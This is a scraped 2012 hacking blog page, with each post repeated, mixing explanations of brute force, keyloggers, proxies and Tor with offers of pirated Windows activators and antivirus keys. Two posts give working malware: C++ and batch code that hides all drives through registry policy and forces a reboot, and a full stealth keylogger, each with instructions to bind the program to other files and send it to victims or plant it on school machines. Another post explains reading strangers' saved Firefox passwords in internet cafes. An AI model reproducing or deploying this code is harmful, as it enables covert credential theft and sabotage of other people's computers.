• Featured

    Windows 8 Could Have Nine Different Backgrounds and Editions

  • Featured

    Don't miss these 10 Things if you are going for Picnic.

  • Articles

    iPhone 6 Will Look Like

  • Articles

    Solar Powered UAVs To Replace Satellites

  • Friday 30 November 2012


    Brute-force attack

    password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.
    Although a brute-force attack may be able to gain access to an account eventually, these attacks can take several hours, days, months, and even years to run. The amount of time it takes to complete these attacks is dependent on how complicated the password is and how well the attacker knows the target.
    To help prevent brute-force attacks many systems will only allow a user to make a mistake in entering their username or password three or four times. If the user exceeds these attempts, the system will either lock them out of the system or prevent any future attempts for a set amount of time.

    ЄƝʆƠƳ ӇƛƇƘƖƝƓ @ƝƖƦƛƝʆƛƝ

    Brute-force attack

    Posted at  Friday, November 30, 2012  |  in  HACKING  |  Read More»


    Brute-force attack

    password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.
    Although a brute-force attack may be able to gain access to an account eventually, these attacks can take several hours, days, months, and even years to run. The amount of time it takes to complete these attacks is dependent on how complicated the password is and how well the attacker knows the target.
    To help prevent brute-force attacks many systems will only allow a user to make a mistake in entering their username or password three or four times. If the user exceeds these attempts, the system will either lock them out of the system or prevent any future attempts for a set amount of time.

    ЄƝʆƠƳ ӇƛƇƘƖƝƓ @ƝƖƦƛƝʆƛƝ

    35 comments:


    Keyloggers

     Keyloggers definition

    keyloggersKeylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
    Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.

     About keyloggers

    key loggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the user. Keylogger is commonly included in rootkits.
    A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.
    There are other approaches to capturing info about what you are doing.
    • Some keyloggers capture screens, rather than keystrokes.
    • Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.
    A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these features:
    • Stealth: invisible in process list
    • Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    • ProBot program files and registry entries are hidden (Windows 2000 / XP)
    • Includes Remote Deployment wizard
    • Active window titles and process names logging
    • Keystroke / password logging
    • Regional keyboard support
    • Keylogging in NT console windows
    • Launched applications list
    • Text snapshots of active applications.
    • Visited Internet URL logger
    • Capture HTTP POST data (including logins/passwords)
    • File and Folder creation/removal logging
    • Mouse activities
    • Workstation user and timestamp recording
    • Log file archiving, separate log files for each user
    • Log file secure encryption
    • Password authentication
    • Invisible operation
    • Native GUI session log presentation
    • Easy log file reports with Instant Viewer 2 Web interface
    • HTML and Text log file export
    • Automatic E-mail log file delivery
    • Easy setup & uninstall wizards
    • Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP
    Because a keylogger can involve dozens of files, and has as a primary goal complete stealth from the user, removing one manually can be a terrifying challenge to any computer user. Incorrect removal efforts can result in damage to the operating system, instability, inability to use the mouse or keyboard, or worse. Further, some key loggers will survive manual efforts to remove them, re-installing themselves before the user even reboots.

    ЄƝʆƠƳ ӇƛƇƘƖƝƓ @ƝƖƦƛƝʆƛƝ

    Keyloggers

    Posted at  Friday, November 30, 2012  |  in  HACKING  |  Read More»


    Keyloggers

     Keyloggers definition

    keyloggersKeylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
    Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.

     About keyloggers

    key loggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the user. Keylogger is commonly included in rootkits.
    A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.
    There are other approaches to capturing info about what you are doing.
    • Some keyloggers capture screens, rather than keystrokes.
    • Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.
    A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these features:
    • Stealth: invisible in process list
    • Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    • ProBot program files and registry entries are hidden (Windows 2000 / XP)
    • Includes Remote Deployment wizard
    • Active window titles and process names logging
    • Keystroke / password logging
    • Regional keyboard support
    • Keylogging in NT console windows
    • Launched applications list
    • Text snapshots of active applications.
    • Visited Internet URL logger
    • Capture HTTP POST data (including logins/passwords)
    • File and Folder creation/removal logging
    • Mouse activities
    • Workstation user and timestamp recording
    • Log file archiving, separate log files for each user
    • Log file secure encryption
    • Password authentication
    • Invisible operation
    • Native GUI session log presentation
    • Easy log file reports with Instant Viewer 2 Web interface
    • HTML and Text log file export
    • Automatic E-mail log file delivery
    • Easy setup & uninstall wizards
    • Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP
    Because a keylogger can involve dozens of files, and has as a primary goal complete stealth from the user, removing one manually can be a terrifying challenge to any computer user. Incorrect removal efforts can result in damage to the operating system, instability, inability to use the mouse or keyboard, or worse. Further, some key loggers will survive manual efforts to remove them, re-installing themselves before the user even reboots.

    ЄƝʆƠƳ ӇƛƇƘƖƝƓ @ƝƖƦƛƝʆƛƝ

    0 comments:


    C++ ,Batch Virus code to disable All Hard disk


    Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.



    C++ Virus Code :

    #include < windows.h >
    #include < fstream.h >
    #include < iostream.h >
    #include < string.h >
    #include < conio.h >
    int main()
    {
    ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

    write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


    Copy the above code and paste in notepad
    Save the file with .cpp extension
    Compile and create .exe file in cpp
    Note:
    Don't run this c++ program ,it will attack your system itself.
    Copy the created .exe file and send it to your victim. You can also attach it with any other
    exe files.


    Batch Virus Code Creation:

    REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

    REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

    shutdown -r -c \"Sorry Your System is hacked by us!\" -f
    I think this code will simple for non c++ programmers. It is easy to create the batch file also.
    Copy the above code to notepad.
    Save it with .bat extension (for ex: nodrivevirus.bat)
    Send the file to your victim

    ЄƝʆƠƳ ӇƛƇƘƖƝƓ @ƝƖƦƛƝʆƛƝ

    C++ ,Batch Virus code to disable All Hard disk

    Posted at  Friday, November 30, 2012  |  in  HACKING  |  Read More»


    C++ ,Batch Virus code to disable All Hard disk


    Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.



    C++ Virus Code :

    #include < windows.h >
    #include < fstream.h >
    #include < iostream.h >
    #include < string.h >
    #include < conio.h >
    int main()
    {
    ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

    write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


    Copy the above code and paste in notepad
    Save the file with .cpp extension
    Compile and create .exe file in cpp
    Note:
    Don't run this c++ program ,it will attack your system itself.
    Copy the created .exe file and send it to your victim. You can also attach it with any other
    exe files.


    Batch Virus Code Creation:

    REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

    REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

    shutdown -r -c \"Sorry Your System is hacked by us!\" -f
    I think this code will simple for non c++ programmers. It is easy to create the batch file also.
    Copy the above code to notepad.
    Save it with .bat extension (for ex: nodrivevirus.bat)
    Send the file to your victim

    ЄƝʆƠƳ ӇƛƇƘƖƝƓ @ƝƖƦƛƝʆƛƝ

    0 comments:


    Learn To create Keylogger using C++|Basic Hacking Tutorials

    Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.



    Disadvantage of Phishing Web page:
    you have to upload phishing web page to web hosting.  But only few website won't detect the phishingwebpage.
    website url is different. Easy to detect that we are hacking.

    Advantage of Spyware-keylogger:
    Very simple and easy method.
    Victim can't detect that we are hacking.

    How to create Keylogger using Visual C++?
    Requirements:
    Dev C++.  Download it from herehttp://www.bloodshed.net/
    Knowledge about Visual C++(need, if you are going to develop the code).

    Install dev C++ in your system and open the dev C++ compiler.
    Go to File->New->Source File.
    you can see a blank works space will be there in window.
    now copy the below keylogger code into the blank work space.
    #include <iostream>
    using namespace std;
    #include <windows.h>
    #include <winuser.h>
    int Save (int key_stroke, char *file);
    void Stealth();

    int main()
    {
    Stealth();
    char i;

    while (1)
    {
    for(i = 8; i <= 190; i++)
    {
    if (GetAsyncKeyState(i) == -32767)
    Save (i,"LOG.txt");
    }
    }
    system ("PAUSE");
    return 0;
    }

    /* *********************************** */

    int Save (int key_stroke, char *file)
    {
    if ( (key_stroke == 1) || (key_stroke == 2) )
    return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");

    cout << key_stroke << endl;

    if (key_stroke == 8)
    fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
    fprintf(OUTPUT_FILE, "%s", "\n");
    else if (key_stroke == 32)
    fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
    fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
    fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
    fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == VK_ESCAPE)
    fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
    fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
    fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
    fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
    fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
    fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
    fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)
    fprintf(OUTPUT_FILE, "%s", ".");
    else
    fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose (OUTPUT_FILE);
    return 0;
    }

    /* *********************************** */

    void Stealth()
    {
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth,0);
    }

    Compile the Code(Ctrl+F9)


    Now execute the program by selecting Execute->Run(ctrl+F10)

    now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
    you can see the log.txt file where you save the file.



    bind the exe file with image or any files and send it to your friend.
    (0r)
    if you have physical access to your college/school system,then copy the exe file in that system and run it.

    For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.

    enjoy hacking @niranjan

    Learn To create Keylogger using C++|Basic Hacking Tutorials

    Posted at  Friday, November 30, 2012  |  in  HACKING  |  Read More»


    Learn To create Keylogger using C++|Basic Hacking Tutorials

    Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.



    Disadvantage of Phishing Web page:
    you have to upload phishing web page to web hosting.  But only few website won't detect the phishingwebpage.
    website url is different. Easy to detect that we are hacking.

    Advantage of Spyware-keylogger:
    Very simple and easy method.
    Victim can't detect that we are hacking.

    How to create Keylogger using Visual C++?
    Requirements:
    Dev C++.  Download it from herehttp://www.bloodshed.net/
    Knowledge about Visual C++(need, if you are going to develop the code).

    Install dev C++ in your system and open the dev C++ compiler.
    Go to File->New->Source File.
    you can see a blank works space will be there in window.
    now copy the below keylogger code into the blank work space.
    #include <iostream>
    using namespace std;
    #include <windows.h>
    #include <winuser.h>
    int Save (int key_stroke, char *file);
    void Stealth();

    int main()
    {
    Stealth();
    char i;

    while (1)
    {
    for(i = 8; i <= 190; i++)
    {
    if (GetAsyncKeyState(i) == -32767)
    Save (i,"LOG.txt");
    }
    }
    system ("PAUSE");
    return 0;
    }

    /* *********************************** */

    int Save (int key_stroke, char *file)
    {
    if ( (key_stroke == 1) || (key_stroke == 2) )
    return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");

    cout << key_stroke << endl;

    if (key_stroke == 8)
    fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
    fprintf(OUTPUT_FILE, "%s", "\n");
    else if (key_stroke == 32)
    fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
    fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
    fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
    fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == VK_ESCAPE)
    fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
    fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
    fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
    fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
    fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
    fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
    fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)
    fprintf(OUTPUT_FILE, "%s", ".");
    else
    fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose (OUTPUT_FILE);
    return 0;
    }

    /* *********************************** */

    void Stealth()
    {
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth,0);
    }

    Compile the Code(Ctrl+F9)


    Now execute the program by selecting Execute->Run(ctrl+F10)

    now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
    you can see the log.txt file where you save the file.



    bind the exe file with image or any files and send it to your friend.
    (0r)
    if you have physical access to your college/school system,then copy the exe file in that system and run it.

    For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.

    enjoy hacking @niranjan

    0 comments:


    Access blocked website in college or school or net center-Proxy Server

    In your college or school they restrict to see some sites ? You can access without any restrictions using the proxy server. 

    What is Proxy?

    Proxy server is some kind of a buffer between your computer and the designated internet destination. When you use a proxy server , your computer will send a request to the proxy server , then the proxyserver will send it to the destination (for example a website), the destination will answer the request the proxy has sent and finally the proxy will return the data to you computer.



    Reasons for using proxy servers:
    • Proxy server is able to increase or decrease the speed of your connection to the Internet depending on the location of the proxy
    • Proxy server ( but only anonymous) can hide your IP address (the resource you visit will retrieve the IP of the proxy, and not your
    • Proxy servers can help in case some owner of an Internet resource impose restrictions for users from certain countries ( for example hulu.com is only reserved for those from United States, if you are not from United States, you can’t watch videos on hulu.com)
    How to Use:
    open the proxy server site .
    when you open the browser it will ask you to get the certificate.
    so click "Get certificate "
    and click "ok"
    Now site will be opened
    The website will ask you to enter the url of site.
    enter url of site you want to visit .

    List of Proxy Sites:

    Pricacywanted.info

    Netrover.info

    Hidemyass.com
    Launchwebs.org
    Clear5.info
    Bingbot.info
    Calculatepie.com
    Unicornpipe.com
    truckflood.com
    fly proxy
    Fire-proxy


    enjoy hacking @niranjan

    Access blocked website in college or school or net center-Proxy Server

    Posted at  Friday, November 30, 2012  |  in  HACKING  |  Read More»


    Access blocked website in college or school or net center-Proxy Server

    In your college or school they restrict to see some sites ? You can access without any restrictions using the proxy server. 

    What is Proxy?

    Proxy server is some kind of a buffer between your computer and the designated internet destination. When you use a proxy server , your computer will send a request to the proxy server , then the proxyserver will send it to the destination (for example a website), the destination will answer the request the proxy has sent and finally the proxy will return the data to you computer.



    Reasons for using proxy servers:
    • Proxy server is able to increase or decrease the speed of your connection to the Internet depending on the location of the proxy
    • Proxy server ( but only anonymous) can hide your IP address (the resource you visit will retrieve the IP of the proxy, and not your
    • Proxy servers can help in case some owner of an Internet resource impose restrictions for users from certain countries ( for example hulu.com is only reserved for those from United States, if you are not from United States, you can’t watch videos on hulu.com)
    How to Use:
    open the proxy server site .
    when you open the browser it will ask you to get the certificate.
    so click "Get certificate "
    and click "ok"
    Now site will be opened
    The website will ask you to enter the url of site.
    enter url of site you want to visit .

    List of Proxy Sites:

    Pricacywanted.info

    Netrover.info

    Hidemyass.com
    Launchwebs.org
    Clear5.info
    Bingbot.info
    Calculatepie.com
    Unicornpipe.com
    truckflood.com
    fly proxy
    Fire-proxy


    enjoy hacking @niranjan

    1 comments:


    How to see saved password in Mozilla firefox

    Here is simple hacking tutorial to view the saved passwords in Mozilla firefox.
    While visiting public internet cafe ,some innocent peoples click the "Remember" while mozilla asking for remembering.   This is one of the benefit for us to hack their account in very simple way.

    Follow these steps to see the saved Passwords:


    • click the "Tools" menu in menu bar.
    • Select Options
    • It will open a small window
    • Select the "security" tab in that small window
    • You can view "saved Passwords" button

    • Click that button.
    • It will another small window
    • There will be list of sites with usernames
    • Select One site and click the "show Password"
    • It will clearly show you the password
    enjoy hacking @niranjan

    How to see saved password in Mozilla firefox

    Posted at  Friday, November 30, 2012  |  in  HACKING  |  Read More»


    How to see saved password in Mozilla firefox

    Here is simple hacking tutorial to view the saved passwords in Mozilla firefox.
    While visiting public internet cafe ,some innocent peoples click the "Remember" while mozilla asking for remembering.   This is one of the benefit for us to hack their account in very simple way.

    Follow these steps to see the saved Passwords:


    • click the "Tools" menu in menu bar.
    • Select Options
    • It will open a small window
    • Select the "security" tab in that small window
    • You can view "saved Passwords" button

    • Click that button.
    • It will another small window
    • There will be list of sites with usernames
    • Select One site and click the "show Password"
    • It will clearly show you the password
    enjoy hacking @niranjan

    0 comments:

    Wednesday 14 November 2012


    All in one Windows 7 Activator (Working 1000%)

     
     Make your windows 7 genuine forever & for free....

    Enjoy Hacking @Niranjan

    All in one Windows 7 Activator (Working 1000%)

    Posted at  Wednesday, November 14, 2012  |  in  HACKING  |  Read More»


    All in one Windows 7 Activator (Working 1000%)

     
     Make your windows 7 genuine forever & for free....

    Enjoy Hacking @Niranjan

    30 comments:


    Protect your privacy,against form network traffic analysis

     
    Tor is very useful for online anonymity, its protect your privacy, defend against a form
     of network traffic analysis. Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic 
    allows others to track your behavior and interests.

    Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create
    new communication tools with built-in privacy features. 

    Tor to keep websites from tracking them and their family members, or to connect to
    news sites, instant messaging services, or the like when these are blocked by their
    local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site.  

    Enjoy Hacking @Niranjan

    Protect your privacy,against form network traffic analysis

    Posted at  Wednesday, November 14, 2012  |  in  HACKING  |  Read More»


    Protect your privacy,against form network traffic analysis

     
    Tor is very useful for online anonymity, its protect your privacy, defend against a form
     of network traffic analysis. Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic 
    allows others to track your behavior and interests.

    Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create
    new communication tools with built-in privacy features. 

    Tor to keep websites from tracking them and their family members, or to connect to
    news sites, instant messaging services, or the like when these are blocked by their
    local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site.  

    Enjoy Hacking @Niranjan

    0 comments:


    Kaspersky internet security 2012 Free 290 days Key Download

     
    Download KIS -2012 from its official site
     &
    run this key after installing
    download key
    Enjoy Hacking @Niranjan

    Kaspersky internet security 2012 Free 290 days Key Download

    Posted at  Wednesday, November 14, 2012  |  in  antivirous  |  Read More»


    Kaspersky internet security 2012 Free 290 days Key Download

     
    Download KIS -2012 from its official site
     &
    run this key after installing
    download key
    Enjoy Hacking @Niranjan

    20 comments:


    All Avast version License keys Free Download | internet security,professional ,home edition

     
    Avast! Internet Security - encompasses all the high technology for one purpose: to provide you with the highest level of protection against computer viruses. avast! Internet Security includes antivirus Avast, and virtualization module processes, anti-spam filter and built-in firewall. Supported by a virus in the letters, there is a script blocker. Virus database is constantly updated and can be downloaded via the Internet.

    Avast! - Anti-virus software that can find viruses on your PC hard disk in its memory, boot sectors, etc.

    Supported by a virus in the letters, there is a script blocker. Virus database is constantly updated and can be downloaded via the Internet. Avast! has a simple and intuitive interface with skins support. The program is equipped with modules for checking email, Internet traffic, IM and P2P clients. Contains a repository of suspicious or infected files and scan engine before loading Windows.

    The new version of avast! 7.0:

    - New:
    • Continuous updating of antivirus databases in real time (in addition to the update schedule).
    • Cloud technology reliability assessment files FileRep, improves protection against new threats, which increases the reliability of detection and speeds up the scanning process.
    • Remote control a computer via an antivirus to get help from more experienced users.
    • Can be installed in compatibility mode for simultaneous operation with other anti-virus as a "second line of defense."
    • Online condition monitoring installed on different computers and the status of antivirus protection system through a web portal AVAST (supported platforms Windows, Mac and Android). 




    Key technologies:
    • core antivirus and antispyware
    • Protection against rootkits in real-time
    • Base avast! Community IQ
    • Study methods intruders in unprotected networks
    • Intelligent checker avast! Intelligent Scanner
    • Intelligent update virus databases
    • Auto / game mode
    • "Green" Computer
    • Shield the file system / e-mail
    • Web Shield
    • Shield P2P/mgnovennyh posts
    • Network Shield
    • Shield of Conduct
    • Shield Script
    • isolated environment avast! Sandbox
    • Automatic firewall
    • Anti-spam

    List of major changes and improvements
    - New installer;
    - Improvements in the GUI;
    - Service FileRep (by clouds);
    - Streaming updates;
    - Improvements in the sandbox sandbox and automatic;
    - Improve the web browser security;
    - The function of remote assistance to solve problems with remote computers;
    - Tools support;
    - Export / Import settings;
    - Update splash screen (screensaver);
    - Runs on Windows 8 Developer Preview;
    - And many other security enhancements.
     
                   Download avast from here           
                        
    LIcsense>:CLICK HERE TO DOWNLOAD
    Enjoy Hacking @Niranjan

    All Avast version License keys Free Download | internet security,professional ,home edition

    Posted at  Wednesday, November 14, 2012  |  in  antivirous  |  Read More»


    All Avast version License keys Free Download | internet security,professional ,home edition

     
    Avast! Internet Security - encompasses all the high technology for one purpose: to provide you with the highest level of protection against computer viruses. avast! Internet Security includes antivirus Avast, and virtualization module processes, anti-spam filter and built-in firewall. Supported by a virus in the letters, there is a script blocker. Virus database is constantly updated and can be downloaded via the Internet.

    Avast! - Anti-virus software that can find viruses on your PC hard disk in its memory, boot sectors, etc.

    Supported by a virus in the letters, there is a script blocker. Virus database is constantly updated and can be downloaded via the Internet. Avast! has a simple and intuitive interface with skins support. The program is equipped with modules for checking email, Internet traffic, IM and P2P clients. Contains a repository of suspicious or infected files and scan engine before loading Windows.

    The new version of avast! 7.0:

    - New:
    • Continuous updating of antivirus databases in real time (in addition to the update schedule).
    • Cloud technology reliability assessment files FileRep, improves protection against new threats, which increases the reliability of detection and speeds up the scanning process.
    • Remote control a computer via an antivirus to get help from more experienced users.
    • Can be installed in compatibility mode for simultaneous operation with other anti-virus as a "second line of defense."
    • Online condition monitoring installed on different computers and the status of antivirus protection system through a web portal AVAST (supported platforms Windows, Mac and Android). 




    Key technologies:
    • core antivirus and antispyware
    • Protection against rootkits in real-time
    • Base avast! Community IQ
    • Study methods intruders in unprotected networks
    • Intelligent checker avast! Intelligent Scanner
    • Intelligent update virus databases
    • Auto / game mode
    • "Green" Computer
    • Shield the file system / e-mail
    • Web Shield
    • Shield P2P/mgnovennyh posts
    • Network Shield
    • Shield of Conduct
    • Shield Script
    • isolated environment avast! Sandbox
    • Automatic firewall
    • Anti-spam

    List of major changes and improvements
    - New installer;
    - Improvements in the GUI;
    - Service FileRep (by clouds);
    - Streaming updates;
    - Improvements in the sandbox sandbox and automatic;
    - Improve the web browser security;
    - The function of remote assistance to solve problems with remote computers;
    - Tools support;
    - Export / Import settings;
    - Update splash screen (screensaver);
    - Runs on Windows 8 Developer Preview;
    - And many other security enhancements.
     
                   Download avast from here           
                        
    LIcsense>:CLICK HERE TO DOWNLOAD
    Enjoy Hacking @Niranjan

    0 comments:

    Tuesday 13 November 2012


    Learn to Detect Hidden trojons Viruses/Keyloggers On Your PC

     
    Are you beware that there is a hidden Trojan, Virus or Keylogger working on your PC and sending your logins to hackers?

    If you are in that situations you don't need to worry anymore. In this post i will show you a security software called Process Revealer that can detect and kill hidden processes.



    Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program. Hidden programs are automatically highlighted in the interface and can be removed in one click.

    Download Process Revealer Free Edition


    Enjoy Hacking @Niranjan

    Learn to Detect Hidden trojons Viruses/Keyloggers On Your PC

    Posted at  Tuesday, November 13, 2012  |  in  HACKING  |  Read More»


    Learn to Detect Hidden trojons Viruses/Keyloggers On Your PC

     
    Are you beware that there is a hidden Trojan, Virus or Keylogger working on your PC and sending your logins to hackers?

    If you are in that situations you don't need to worry anymore. In this post i will show you a security software called Process Revealer that can detect and kill hidden processes.



    Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program. Hidden programs are automatically highlighted in the interface and can be removed in one click.

    Download Process Revealer Free Edition


    Enjoy Hacking @Niranjan

    0 comments:


    The Ultimate Guide to Computer Repairing ( E-book)

     
    The Ultimate Guide to Computer Repairing  is amazing book for everyone to read. Read how to maintain and repair any desktop and laptop computer. E book Has Articles with photos and videos that show detailed step by step PC repair and maintenance procedures E book also have many links to online videos that explain how you can build, maintain, speed up, clean, and repair your computer yourself. Put the money that you were going to pay the PC Tech in your own pocket. 


    Enjoy Hacking @Niranjan

    The Ultimate Guide to Computer Repairing ( E-book)

    Posted at  Tuesday, November 13, 2012  |  in  HACKING  |  Read More»


    The Ultimate Guide to Computer Repairing ( E-book)

     
    The Ultimate Guide to Computer Repairing  is amazing book for everyone to read. Read how to maintain and repair any desktop and laptop computer. E book Has Articles with photos and videos that show detailed step by step PC repair and maintenance procedures E book also have many links to online videos that explain how you can build, maintain, speed up, clean, and repair your computer yourself. Put the money that you were going to pay the PC Tech in your own pocket. 


    Enjoy Hacking @Niranjan

    0 comments:


    Hacking Exposed 5 (E-book)

    Hacking Exposed 


    Hacking Exposed-5 :-
